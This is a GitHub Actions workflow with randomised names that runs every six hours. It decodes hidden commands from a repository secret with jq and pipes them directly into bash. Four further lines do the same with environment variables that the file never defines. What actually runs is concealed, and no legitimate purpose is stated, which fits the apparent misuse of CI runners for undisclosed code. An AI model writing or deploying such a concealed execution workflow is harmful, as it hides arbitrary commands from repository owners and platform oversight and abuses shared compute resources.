name: yanhuidang8765

on:
  workflow_dispatch:
  schedule:
    - cron: '44 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanhuidang8765
        env:
          e103: ${{ secrets.e103 }}
        run: |
          echo $e103 | jq -r .u72869 | /bin/bash
          echo $n9 | jq -r .wvu623 | /bin/bash
          echo $dqkn101 | jq -r .wjgnt32 | /bin/bash
          echo $dbep42 | jq -r .xdu50 | /bin/bash
          echo $fxb07 | jq -r .cg539 | /bin/bash

